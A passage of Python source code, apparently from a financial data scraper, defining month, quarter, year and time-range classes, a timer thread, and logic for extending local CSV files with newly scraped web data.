*args):\n super(FinanceMonth, self).__init__()\n self.month = None # range: 1 - 12\n self.month_str = None\n try:\n format_unsupport = False\n if len(args) == 1:\n time_cfg = None\n if isinstance(args[0], str):\n mobj = CMN_FUNC.check_month_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n # self.year = mobj.group(1)\n self.month = int(mobj.group(2))\n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceMonth):\n self.setup_year_value(args[0].year)\n # self.year = args[0].year\n self.month = args[0].month\n else:\n format_unsupport = True\n elif len(args) == 2:\n for index in range(2):\n if type(args[index]) is not int:\n format_unsupport = True\n self.setup_year_value(args[0])\n # self.year = args[0]\n self.month = args[1]\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n 
raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceMonth, due to: %s\" % str(e))\n# Check value range\n FinanceMonth.check_value_range(self.year, self.month)\n\n\n @staticmethod\n def check_value_range(year, month):\n# Check Year Range\n CMN_FUNC.check_year_range(year)\n# Check Month Range\n CMN_FUNC.check_month_range(month)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_MONTH\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n def __to_month_index(self):\n return self.year * 12 + self.month - 1\n\n\n def __from_month_index_to_value(self, month_index):\n # year = month_index / 12\n # month = month_index % 12 + 1\n return MonthTuple(month_index / 12, month_index % 12 + 1)\n\n\n def __add__(self, month_delta):\n if not isinstance(month_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(month_delta))\n\n new_month_index = self.__to_month_index() + month_delta\n new_month_tuple = self.__from_month_index_to_value(new_month_index)\n return FinanceMonth(new_month_tuple.year, new_month_tuple.month)\n\n\n def __sub__(self, month_delta):\n if not isinstance(month_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(month_delta))\n\n new_month_index = self.__to_month_index() - month_delta\n new_month_tuple = self.__from_month_index_to_value(new_month_index)\n return FinanceMonth(new_month_tuple.year, new_month_tuple.month)\n\n\n def to_string(self):\n if self.month_str is None:\n self.month_str = CMN_FUNC.transform_month_str(self.year, self.month)\n return self.month_str\n\n\n def get_value(self):\n return (self.year << 4 | self.month)\n\n\n def get_value_tuple(self):\n return (self.year, self.month)\n\n def get_last_date_of_month(self):\n return calendar.monthrange(self.year, self.month)[1]\n\n\nclass FinanceQuarter(FinanceTimeBase):\n\n ANNUAL_REPORT_MONTH = 3\n ANNUAL_REPORT_DAY = 31\n Q1_QUARTERLY_REPORT_MONTH = 5\n Q1_QUARTERLY_REPORT_DAY = 15\n Q2_QUARTERLY_REPORT_MONTH = 8\n Q2_QUARTERLY_REPORT_DAY = 14\n Q3_QUARTERLY_REPORT_MONTH = 11\n Q3_QUARTERLY_REPORT_DAY = 14\n\n @classmethod\n def __get_statement_release_date_list(cls, year):\n statement_release_date_list = [\n FinanceDate(year, cls.ANNUAL_REPORT_MONTH, cls.ANNUAL_REPORT_DAY),\n FinanceDate(year, cls.Q1_QUARTERLY_REPORT_MONTH, cls.Q1_QUARTERLY_REPORT_DAY),\n FinanceDate(year, cls.Q2_QUARTERLY_REPORT_MONTH, cls.Q2_QUARTERLY_REPORT_DAY),\n FinanceDate(year, cls.Q3_QUARTERLY_REPORT_MONTH, cls.Q3_QUARTERLY_REPORT_DAY), \n ]\n return statement_release_date_list\n\n\n @classmethod\n def get_start_finance_quarter_from_date(cls, *date_args):\n \"\"\" Find the nearest start finance qaurter due to the specific finance date\"\"\"\n finance_date = None\n if isinstance(date_args[0], FinanceDate):\n finance_date = date_args[0]\n else:\n finance_date = FinanceDate(*date_args)\n statement_release_date_list = cls.__get_statement_release_date_list(finance_date.year)\n finance_quarter = None\n if finance_date <= statement_release_date_list[0]:\n finance_quarter = FinanceQuarter(finance_date.year - 1, 4)\n elif statement_release_date_list[1] >= finance_date > statement_release_date_list[0]:\n finance_quarter = FinanceQuarter(finance_date.year, 1)\n elif statement_release_date_list[2] >= finance_date > statement_release_date_list[1]:\n finance_quarter = FinanceQuarter(finance_date.year, 2)\n elif statement_release_date_list[3] >= finance_date > statement_release_date_list[2]:\n finance_quarter 
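# --- illustrative sketch, not part of the scraped file above ---
# FinanceMonth.__add__/__sub__ linearize (year, month) into a single month
# index, year*12 + (month - 1), so month arithmetic becomes plain integer
# math. Standalone version; note the floor division, which keeps the year
# integral on Python 3, where the original file's "/" would produce a float:
def add_months(year, month, delta):
    idx = year * 12 + (month - 1) + delta
    return idx // 12, idx % 12 + 1

assert add_months(2016, 11, 3) == (2017, 2)    # crosses the year boundary
assert add_months(2016, 1, -1) == (2015, 12)   # and back across it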
= FinanceQuarter(finance_date.year, 3)\n elif finance_date >= statement_release_date_list[3]:\n finance_quarter = FinanceQuarter(finance_date.year, 4)\n else:\n raise ValueError(\"Fail to transform the finance date[%s] to quarter\" % finance_date)\n return finance_quarter\n\n\n @classmethod\n def get_end_finance_quarter_from_date(cls, *date_args):\n \"\"\" Find the nearest end finance qaurter due to the specific finance date\"\"\"\n finance_date = None\n if isinstance(date_args[0], FinanceDate):\n finance_date = date_args[0]\n else:\n finance_date = FinanceDate(*date_args)\n statement_release_date_list = cls.__get_statement_release_date_list(finance_date.year)\n finance_quarter = None\n if finance_date < statement_release_date_list[0]:\n finance_quarter = FinanceQuarter(finance_date.year - 1, 3)\n elif statement_release_date_list[1] > finance_date >= statement_release_date_list[0]:\n finance_quarter = FinanceQuarter(finance_date.year - 1, 4)\n elif statement_release_date_list[2] > finance_date >= statement_release_date_list[1]:\n finance_quarter = FinanceQuarter(finance_date.year, 1)\n elif statement_release_date_list[3] > finance_date >= statement_release_date_list[2]:\n finance_quarter = FinanceQuarter(finance_date.year, 2)\n elif finance_date >= statement_release_date_list[3]:\n finance_quarter = FinanceQuarter(finance_date.year, 3)\n else:\n raise ValueError(\"Fail to transform the end finance date[%s] to quarter\" % finance_date)\n return finance_quarter\n\n\n def __init__(self, *args):\n super(FinanceQuarter, self).__init__()\n self.quarter = None\n self.quarter_str = None\n # import pdb; pdb.set_trace()\n try:\n format_unsupport = False\n if len(args) == 1:\n if isinstance(args[0], str):\n mobj = CMN_FUNC.check_quarter_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n # self.year = mobj.group(1)\n self.quarter = int(mobj.group(2))\n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceQuarter):\n self.setup_year_value(args[0].year)\n # self.year = args[0].year\n self.quarter = (int)(math.ceil(args[0].month / 3.0))\n else:\n format_unsupport = True\n elif len(args) == 2:\n for index in range(2):\n if type(args[index]) is not int:\n format_unsupport = True\n self.year = args[0]\n self.quarter = args[1]\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceQuarter, due to: %s\" % str(e))\n# Check value Range\n FinanceQuarter.check_value_range(self.year, self.quarter)\n\n\n @staticmethod\n def check_value_range(year, quarter):\n# Check Year Range\n CMN_FUNC.check_year_range(year)\n# Check Quarter Range\n CMN_FUNC.check_quarter_range(quarter)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_QUARTER\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n def __to_quarter_index(self):\n return self.year * 4 + self.quarter - 1\n\n\n def __from_quarter_index_to_value(self, quarter_index):\n return QuarterTuple(quarter_index / 4, quarter_index % 4 + 1)\n\n\n def __add__(self, quarter_delta):\n if not isinstance(quarter_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(quarter_delta))\n\n new_quarter_index = self.__to_quarter_index() + quarter_delta\n new_quarter_tuple = self.__from_quarter_index_to_value(new_quarter_index)\n return FinanceQuarter(new_quarter_tuple.year, 
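# --- illustrative sketch, not part of the scraped file above ---
# get_end_finance_quarter_from_date above maps a calendar date to the latest
# quarter whose statement is already public, using the release deadlines
# hard-coded in FinanceQuarter (3/31 annual, 5/15 Q1, 8/14 Q2, 11/14 Q3 -
# these look like Taiwan's disclosure calendar, which would fit the
# republic-era years used elsewhere in the file). The same lookup over plain
# dates:
from datetime import date

def latest_reported_quarter(d):
    deadlines = [date(d.year, 3, 31), date(d.year, 5, 15),
                 date(d.year, 8, 14), date(d.year, 11, 14)]
    if d < deadlines[0]:
        return (d.year - 1, 3)
    if d < deadlines[1]:
        return (d.year - 1, 4)   # annual report is out, Q1 is not yet due
    if d < deadlines[2]:
        return (d.year, 1)
    if d < deadlines[3]:
        return (d.year, 2)
    return (d.year, 3)

assert latest_reported_quarter(date(2016, 6, 1)) == (2016, 1)
assert latest_reported_quarter(date(2016, 2, 1)) == (2015, 3)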
new_quarter_tuple.quarter)\n\n\n def __sub__(self, quarter_delta):\n if not isinstance(quarter_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(quarter_delta))\n\n new_quarter_index = self.__to_quarter_index() - quarter_delta\n new_quarter_tuple = self.__from_quarter_index_to_value(new_quarter_index)\n return FinanceQuarter(new_quarter_tuple.year, new_quarter_tuple.quarter)\n\n\n def to_string(self):\n if self.quarter_str is None:\n self.quarter_str = CMN_FUNC.transform_quarter_str(self.year, self.quarter)\n return self.quarter_str\n\n\n def get_value(self):\n return (self.year << 3 | self.quarter)\n\n\n def get_value_tuple(self):\n return (self.year, self.quarter)\n\n\nclass FinanceYear(FinanceTimeBase):\n\n @classmethod\n def get_finance_year_from_date(cls, *date_args):\n \"\"\" Find the finance year due to the specific finance date\"\"\"\n \n finance_date = None\n if isinstance(date_args[0], FinanceDate):\n finance_date = date_args[0]\n else:\n raise ValueError(\"UnSupport input argument: %s\" % date_args)\n return cls(finance_date.year)\n\n\n def __init__(self, *args):\n super(FinanceYear, self).__init__()\n self.year = None # range: 2000 - 2099\n self.year_str = None\n # import pdb; pdb.set_trace()\n try:\n format_unsupport = False\n if len(args) == 1:\n time_cfg = None\n if isinstance(args[0], str):\n mobj = CMN_FUNC.check_year_str_format(args[0])\n self.setup_year_value(mobj.group(0))\n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceMonth):\n self.setup_year_value(args[0].year)\n else:\n format_unsupport = True\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceYear, due to: %s\" % str(e))\n# Check value range\n CMN_FUNC.check_year_range(self.year)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_YEAR\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n def __add__(self, year_delta):\n if not isinstance(year_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(year_delta))\n new_year = self.year + year_delta\n return FinanceYear(new_year)\n\n\n def __sub__(self, year_delta):\n if not isinstance(year_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(year_delta))\n new_year = self.year - year_delta\n return FinanceYear(new_year)\n\n\n def to_string(self):\n if self.year_str is None:\n self.year_str = \"%d\" % self.year\n return self.year_str\n\n\n def get_value(self):\n return self.year\n\n\n def get_value_tuple(self):\n return (self.year,)\n\n\nclass FinanceTimeRange(object):\n\n def __init__(self, *args):\n self.time_start = None\n self.time_end = None\n self.time_range_str = None\n # import pdb; pdb.set_trace()\n try:\n format_unsupport = False\n if len(args) == 1:\n if isinstance(args[0], str):\n (self.time_start, self.time_end) = CMN_FUNC.parse_time_duration_range_str_to_object(args[0])\n else:\n format_unsupport = True\n elif len(args) == 2:\n for index in range(2):\n if not isinstance(args[index], FinanceTimeBase):\n format_unsupport = True\n self.time_start = args[0]\n self.time_end = args[1]\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise 
Exception(\"Exception occurs in FinanceTimeRange, due to: %s\" % str(e))\n\n\n def is_greater_than_time_start(self, finance_time):\n return False if ((self.time_start is not None) and (finance_time < self.time_start)) else True\n\n\n def is_less_than_time_end(self, finance_time):\n return False if ((self.time_end is not None) and (finance_time > self.time_end)) else True\n\n\n# class ParseURLDataType:\n\n# def __init__(self):\n# # self.parse_url_data_type = None\n# pass\n\n\n# def get_type(self):\n# raise NotImplementedError\n\n\n# class ParseURLDataByBS4(ParseURLDataType):\n\n# def __init__(self, encoding, select_flag):\n# # self.parse_url_data_type = CMN.PARSE_URL_DATA_BY_BS4\n# self.encoding = encoding\n# self.select_flag = select_flag\n\n\n# def get_type(self):\n# return CMN.PARSE_URL_DATA_BY_BS4\n\n\n# class ParseURLDataByJSON(ParseURLDataType):\n\n# def __init__(self, data_field_name):\n# # self.parse_url_data_type = CMN.PARSE_URL_DATA_BY_BS4\n# self.data_field_name = data_field_name\n\n\n# def get_type(self):\n# return CMN.PARSE_URL_DATA_BY_JSON\n\n\nclass FinanceTimerThread(threading.Thread):\n\n def __init__(self, **cfg):\n super(FinanceTimerThread, self).__init__()\n self.daemon = True\n self.xcfg = {\n \"func_ptr\": None,\n \"interval\": 30,\n }\n self.xcfg.update(cfg)\n # self.exit = False\n # if self.xcfg[\"func_ptr\"] is None:\n # raise ValueError(\"func_ptr should NOT be None\")\n self.exit_event = threading.Event()\n self.interval = self.xcfg[\"interval\"]\n self.func_ptr = None\n self.func_args = None\n self.func_kwargs = None\n self.start_time = None\n\n\n def start_timer(self, func_ptr, *args, **kwargs):\n self.func_ptr = func_ptr\n self.func_args = args\n self.func_kwargs = kwargs\n # self.start_time = time()\n # self.exit = True\n self.start()\n\n\n def stop_timer(self, timeout=5):\n # self.exit = True\n self.exit_event.set( )\n threading.Thread.join(self, timeout)\n\n\n def run(self):\n while not self.exit_event.isSet( ):\n self.func_ptr(*self.func_args, **self.func_kwargs)\n self.exit_event.wait(self.interval)\n\n\n#############################################################################################\n\nclass CSVTimeRangeUpdate(object):\n \n CSV_APPEND_NONE = 0 # No new web data to append\n CSV_APPEND_BEFORE = 1 # new web data will be appended in front of the old csv data\n CSV_APPEND_AFTER = 2 # new web data will be appended in back of the old csv data\n # CSV_APPEND_BOTH = 3 # new web data will be appended in front and back(both) of the old csv data\n\n @classmethod\n def get_init_csv_time_duration_update(cls, time_duration_start, time_duration_end):\n # import pdb; pdb.set_trace()\n# If it's time first time to write the data from web to CSV ......\n web2csv_time_duration_update = cls()\n web2csv_time_duration_update.NewCSVStart = web2csv_time_duration_update.NewWebStart = time_duration_start\n web2csv_time_duration_update.NewCSVEnd = web2csv_time_duration_update.NewWebEnd = time_duration_end\n web2csv_time_duration_update.AppendDirection = cls.CSV_APPEND_AFTER\n new_csv_extension_time_duration = TimeDurationTuple(web2csv_time_duration_update.NewWebStart, web2csv_time_duration_update.NewWebEnd)\n return (new_csv_extension_time_duration, (web2csv_time_duration_update,),)\n\n\n @classmethod\n def get_extended_csv_time_duration_update(cls, time_duration_start, time_duration_end, csv_old_time_duration_tuple):\n # import pdb; pdb.set_trace()\n# Adjust the time duration, ignore the data which already exist in the finance data folder\n# I assume that the time 
duration between the csv data and new data should be consecutive\n# Two cases which the original time range can be extended successfully: \n# (1) The new time range overlaps the original one\n# (2) The new time range fully covers the original one\n overlap_case = CMN_FUNC.get_time_range_overlap_case(time_duration_start, time_duration_end, csv_old_time_duration_tuple.time_duration_start, csv_old_time_duration_tuple.time_duration_end)\n new_csv_extension_time_duration = None\n web2csv_time_duration_update_before = None\n web2csv_time_duration_update_after = None\n if overlap_case == CMN_DEF.TIME_OVERLAP_COVERED:\n# # All csv data already exists, no need to update the new data\n# g_logger.debug(\"The time duration[%s:%s] of the CSV data[%s] already exist ......\" % (time_duration_start, time_duration_end, CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX]))\n# new_csv_extension_time_duration = None\n# return None\n return (new_csv_extension_time_duration, None,)\n elif overlap_case == CMN_DEF.TIME_OVERLAP_BEFORE:\n# The new time range is extended before the start side of the original time range\n web2csv_time_duration_update_before = cls()\n web2csv_time_duration_update_before.OldCSVStart = csv_old_time_duration_tuple.time_duration_start\n web2csv_time_duration_update_before.OldCSVEnd = csv_old_time_duration_tuple.time_duration_end\n web2csv_time_duration_update_before.NewWebStart = time_duration_start\n web2csv_time_duration_update_before.NewWebEnd = web2csv_time_duration_update_before.OldCSVStart - 1\n web2csv_time_duration_update_before.AppendDirection = cls.CSV_APPEND_BEFORE\n # g_logger.debug(\"Extend the time duration before the original CSV data[%s %s:%s]: %s:%s\" % (CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX], web2csv_time_duration_update_before.OldCSVStart, web2csv_time_duration_update_before.OldCSVEnd, web2csv_time_duration_update_before.NewWebStart, web2csv_time_duration_update_before.NewWebEnd))\n new_csv_extension_time_duration = TimeDurationTuple(web2csv_time_duration_update_before.NewWebStart, web2csv_time_duration_update_before.OldCSVEnd)\n return (new_csv_extension_time_duration, (web2csv_time_duration_update_before,),)\n elif overlap_case == CMN_DEF.TIME_OVERLAP_AFTER:\n# The new time range is extended after the end side of the original time range\n web2csv_time_duration_update_after = cls()\n web2csv_time_duration_update_after.OldCSVStart = csv_old_time_duration_tuple.time_duration_start\n web2csv_time_duration_update_after.OldCSVEnd = csv_old_time_duration_tuple.time_duration_end\n web2csv_time_duration_update_after.NewWebStart = web2csv_time_duration_update_after.OldCSVEnd + 1\n web2csv_time_duration_update_after.NewWebEnd = time_duration_end\n web2csv_time_duration_update_after.AppendDirection = cls.CSV_APPEND_AFTER\n # g_logger.debug(\"Extend the time duration after the original CSV data[%s %s:%s]: %s:%s\" % (CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX], web2csv_time_duration_update_after.OldCSVStart, web2csv_time_duration_update_after.OldCSVEnd, web2csv_time_duration_update_after.NewWebStart, web2csv_time_duration_update_after.NewWebEnd))\n new_csv_extension_time_duration = TimeDurationTuple(web2csv_time_duration_update_after.OldCSVStart, web2csv_time_duration_update_after.NewWebEnd)\n return (new_csv_extension_time_duration, (web2csv_time_duration_update_after,),)\n elif overlap_case == CMN_DEF.TIME_OVERLAP_COVER:\n# The new time range covers the original time range and extended before/after the start/end side of the original time 
range\n web2csv_time_duration_update_before = cls()\n web2csv_time_duration_update_before.OldCSVStart = csv_old_time_duration_tuple.time_duration_start\n web2csv_time_duration_update_before.OldCSVEnd = csv_old_time_duration_tuple.time_duration_end\n web2csv_time_duration_update_before.NewWebStart = time_duration_start\n web2csv_time_duration_update_before.NewWebEnd = web2csv_time_duration_update_before.OldCSVStart - 1\n web2csv_time_duration_update_before.AppendDirection = cls.CSV_APPEND_BEFORE\n # g_logger.debug(\"Extend the time duration before the original CSV data[%s %s:%s]: %s:%s\" % (CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX], web2csv_time_duration_update_before.OldCSVStart, web2csv_time_duration_update_before.OldCSVEnd, web2csv_time_duration_update_before.NewWebStart, web2csv_time_duration_update_before.NewWebEnd))\n web2csv_time_duration_update_after = cls()\n web2csv_time_duration_update_after.OldCSVStart = csv_old_time_duration_tuple.time_duration_start\n web2csv_time_duration_update_after.OldCSVEnd = csv_old_time_duration_tuple.time_duration_end\n web2csv_time_duration_update_after.NewWebStart = web2csv_time_duration_update_after.OldCSVEnd + 1\n web2csv_time_duration_update_after.NewWebEnd = time_duration_end\n web2csv_time_duration_update_after.AppendDirection = cls.CSV_APPEND_AFTER\n # g_logger.debug(\"Extend the time duration after the original CSV data[%s %s:%s]: %s:%s\" % (CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX], web2csv_time_duration_update_after.OldCSVStart, web2csv_time_duration_update_after.OldCSVEnd, web2csv_time_duration_update_after.NewWebStart, web2csv_time_duration_update_after.NewWebEnd))\n new_csv_extension_time_duration = TimeDurationTuple(web2csv_time_duration_update_before.NewWebStart, web2csv_time_duration_update_after.NewWebEnd)\n return (new_csv_extension_time_duration, (web2csv_time_duration_update_before, web2csv_time_duration_update_after,),)\n# If the time range of new data contain all the time range of csv data, the system is not desiged to update two time range interval\n else:\n raise CMN.EXCEPTION.WebScrapyUnDefiedCaseException(\"The system does NOT support this type[2] of the range update; CSV data[%s:%s], new data[%s:%s]\" % (csv_old_time_duration_tuple.time_duration_start, csv_old_time_duration_tuple.time_duration_end, time_duration_start, time_duration_end))\n\n\n @classmethod\n def get_csv_time_duration_update(cls, time_duration_start, time_duration_end, csv_old_time_duration_tuple=None):\n if csv_old_time_duration_tuple is None:\n return cls.get_init_csv_time_duration_update(time_duration_start, time_duration_end)\n else:\n return cls.get_extended_csv_time_duration_update(time_duration_start, time_duration_end, csv_old_time_duration_tuple)\n\n\n def __init__(self):\n self.append_direction = self.CSV_APPEND_NONE\n self.old_csv_start = None\n self.old_csv_end = None\n self.new_web_start = None\n self.new_web_end = None\n # self.new_csv_start = None\n # self.new_csv_end = None\n self.description = None\n\n\n def __str__(self):\n if self.description is None:\n self.description = \"\"\n if self.old_csv_start is not None:\n self.description += \"OCS: %s; \" % self.old_csv_start\n if self.old_csv_end is not None:\n self.description += \"OCE: %s; \" % self.old_csv_end\n if self.new_web_start is not None:\n self.description += \"NWS: %s; \" % self.new_web_start\n if self.new_web_end is not None:\n self.description += \"NWE: %s; \" % self.new_web_end\n # if self.new_csv_start is not None:\n # self.description += \"NCS: 
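# --- illustrative sketch, not part of the scraped file above ---
# get_extended_csv_time_duration_update above branches on how the requested
# range relates to what the CSV already holds: fully covered (nothing to
# fetch), extending before, extending after, or covering both ends. The
# original assumes the two ranges touch, so fully disjoint requests raise.
# The same four-way classification over integer endpoints:
def overlap_case(new_start, new_end, old_start, old_end):
    if new_start >= old_start and new_end <= old_end:
        return "covered"        # everything is already on disk
    if new_start < old_start and new_end <= old_end:
        return "extend-before"  # fetch [new_start, old_start - 1]
    if new_start >= old_start and new_end > old_end:
        return "extend-after"   # fetch [old_end + 1, new_end]
    return "cover"              # fetch both missing ends

assert overlap_case(3, 5, 1, 9) == "covered"
assert overlap_case(0, 5, 3, 9) == "extend-before"
assert overlap_case(5, 12, 3, 9) == "extend-after"
assert overlap_case(0, 12, 3, 9) == "cover"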
%s; \" % self.new_csv_start\n # if self.new_csv_end is not None:\n # self.description += \"NCE: %s; \" % self.new_csv_end\n return self.description\n\n\n def __repr__(self):\n return self.__str__()\n\n @property\n def NeedUpdate(self):\n return (True if (self.append_direction != self.CSV_APPEND_NONE) else False)\n\n @property\n def AppendDirection(self):\n return self.append_direction\n @AppendDirection.setter\n def AppendDirection(self, append_direction):\n self.append_direction = append_direction\n\n @property\n def OldCSVStart(self):\n return self.old_csv_start\n @OldCSVStart.setter\n def OldCSVStart(self, old_csv_start):\n self.old_csv_start = old_csv_start\n\n @property\n def OldCSVEnd(self):\n return self.old_csv_end\n @OldCSVEnd.setter\n def OldCSVEnd(self, old_csv_end):\n self.old_csv_end = old_csv_end\n\n @property\n def NewWebStart(self):\n return self.new_web_start\n @NewWebStart.setter\n def NewWebStart(self, new_web_start):\n self.new_web_start = new_web_start\n\n @property\n def NewWebEnd(self):\n return self.new_web_end\n @NewWebEnd.setter\n def NewWebEnd(self, new_web_end):\n self.new_web_end = new_web_end\n\n # @property\n # def NewCSVStart(self):\n # return self.new_csv_start\n # @NewCSVStart.setter\n # def NewCSVStart(self, new_csv_start):\n # self.new_csv_start = new_csv_start\n\n # @property\n # def NewCSVEnd(self):\n # return self.new_csv_end\n # @NewCSVEnd.setter\n # def NewCSVEnd(self, new_csv_end):\n # self.new_csv_end = new_csv_end\n\n\n def backup_old_csv_if_necessary(self, csv_filepath, ignore_old_csv_exist=False):\n backup_old_csv = False\n if self.append_direction == self.CSV_APPEND_BEFORE: #BASE.BASE.ScrapyBase.CSVTimeRangeUpdate.CSV_APPEND_BEFORE:\n old_csv_filepath = csv_filepath + \".old\"\n if CMN_FUNC.check_file_exist(old_csv_filepath):\n if not ignore_old_csv_exist:\n raise ValueError(\"The CSV file[%s] already exists !!!\" % old_csv_filepath)\n else:\n # g_logger.debug(\"Need add the new data in front of the old CSV data, rename the file: %s\" % (csv_filepath + \".old\"))\n CMN_FUNC.rename_file_if_exist(csv_filepath, csv_filepath + \".old\") \n backup_old_csv = True\n return backup_old_csv\n\n\n def append_old_csv_if_necessary(self, csv_filepath):\n if self.append_direction == self.CSV_APPEND_BEFORE: #BASE.BASE.ScrapyBase.CSVTimeRangeUpdate.CSV_APPEND_BEFORE:\n # g_logger.debug(\"Append the old CSV data to the file: %s\" % csv_filepath)\n CMN_FUNC.append_data_into_file(csv_filepath + \".old\", csv_filepath)\n CMN_FUNC.remove_file_if_exist(csv_filepath + \".old\") \n\n\nclass CSVFileNoScrapyRecord(object):\n\n # STATUS_RECORD_TIME_RANGE_NOT_OVERLAP = 0\n # STATUS_RECORD_CSV_FILE_ALREADY_EXIST = 1\n # STATUS_RECORD_WEB_DATA_NOT_FOUND = 2\n # RECORD_TYPE_INDEX_LIST = [\n # STATUS_RECORD_TIME_RANGE_NOT_OVERLAP,\n # STATUS_RECORD_CSV_FILE_ALREADY_EXIST,\n # STATUS_RECORD_WEB_DATA_NOT_FOUND\n # ]\n RECORD_TYPE_INDEX = 0\n RECORD_TYPE_DESCRIPTION_INDEX = 1\n RECORD_TYPE_ENTRY_LIST = [\n [\"TimeRangeNotOverlap\", \"The search time range does NOT overlap the one in the URL time range lookup table\",],\n [\"CSVFileAlreadyExist\", \"The CSV files of the time range has already existed in the local folder\",],\n [\"WebDataNotFound\", \"The web data of the URL is NOT found\",],\n ]\n RECORD_TYPE_SIZE = len(RECORD_TYPE_ENTRY_LIST)\n TIME_RANGE_NOT_OVERLAP_RECORD_INDEX = 0\n CSV_FILE_ALREADY_EXIST_RECORD_INDEX = 1\n WEB_DATA_NOT_FOUND_RECORD_INDEX = 2\n\n RECORD_TYPE_LIST = [entry[RECORD_TYPE_INDEX] for entry in RECORD_TYPE_ENTRY_LIST]\n RECORD_TYPE_DESCRIPTION_LIST = 
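# --- illustrative sketch, not part of the scraped file above ---
# backup_old_csv_if_necessary/append_old_csv_if_necessary above implement
# "prepend rows to a CSV" as: rename the old file to *.old, write the new
# rows under the original name, append the stashed rows back, then delete
# the backup. The same dance against throwaway temp files:
import tempfile
from pathlib import Path

with tempfile.TemporaryDirectory() as tmp:
    csv_path = Path(tmp) / "data.csv"
    backup = Path(tmp) / "data.csv.old"
    csv_path.write_text("2,old\n")
    csv_path.rename(backup)              # stash the existing rows
    csv_path.write_text("1,new\n")       # write the rows that come first
    with csv_path.open("a") as out:      # append the stashed rows back
        out.write(backup.read_text())
    backup.unlink()
    assert csv_path.read_text() == "1,new\n2,old\n"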
[entry[RECORD_TYPE_DESCRIPTION_INDEX] for entry in RECORD_TYPE_ENTRY_LIST]\n\n @classmethod\n def create_register_status_instance(cls):\n # import pdb; pdb.set_trace()\n csv_file_no_scrapy_record = cls()\n for index in range(cls.RECORD_TYPE_SIZE):\n csv_file_no_scrapy_record.__register_record_type(\n cls.RECORD_TYPE_LIST[index], \n cls.RECORD_TYPE_DESCRIPTION_LIST[index]\n )\n return csv_file_no_scrapy_record\n\n\n def __init__(self):\n self.record_type_dict = {}\n self.record_type_description_dict = {}\n self.web_data_not_found_time_start = None\n self.web_data_not_found_time_end = None\n\n\n def __register_record_type(self, record_type_name, record_type_description):\n # import pdb; pdb.set_trace()\n if self.record_type_dict.has_key(record_type_name):\n g_logger.debug(\"The type[%s] has already exist\" % record_type_name)\n return\n self.record_type_dict[record_type_name] = []\n self.record_type_description_dict[record_type_name] = record_type_description\n\n\n def __add_record(self, record_type_name, *args):\n if not self.record_type_dict.has_key(record_type_name):\n raise ValueError(\"Unknown Check Status Type: %s\" % record_type_name)\n self.record_type_dict[record_type_name].append(args)\n\n\n def add_time_range_not_overlap_record(self, *args):\n# Market\n# args[0]: source type index\n# Stock\n# args[0]: source type index\n# args[1]: company code number\n self.__add_record(\"TimeRangeNotOverlap\", *args)\n\n\n def add_csv_file_already_exist_record(self, *args):\n# Market\n# args[0]: source type index\n# Stock\n# args[0]: source type index\n# args[1]: company code number\n self.__add_record(\"CSVFileAlreadyExist\", *args)\n\n\n def add_web_data_not_found_record(self, *args):\n# Market\n# args[0]: time slice. None for a must to flush data into list\n# args[1]: source type index\n# Stock\n# args[0]: time slice. None for a must to flush data into list\n# args[1]: source type index\n# args[2]: company code number\n need_flush = False\n if args[0] is None:\n if self.web_data_not_found_time_start is not None:\n need_flush = True\n else:\n if self.web_data_not_found_time_start is None:\n self.web_data_not_found_time_start = self.web_data_not_found_time_end = args[0]\n else:\n if self.web_data_not_found_time_end.check_continous_time_duration(args[0]):\n self.web_data_not_found_time_end = args[0]\n else:\n need_flush = True\n# Keep track of the time range in which the web data is empty\n if need_flush:\n# Market\n# args_new[0]: time slice. None for a must to flush data into list\n# args_new[1]: source type index\n# args_new[2]: empty time start\n# args_new[3]: empty time end\n# Stock\n# args_new[0]: time slice. 
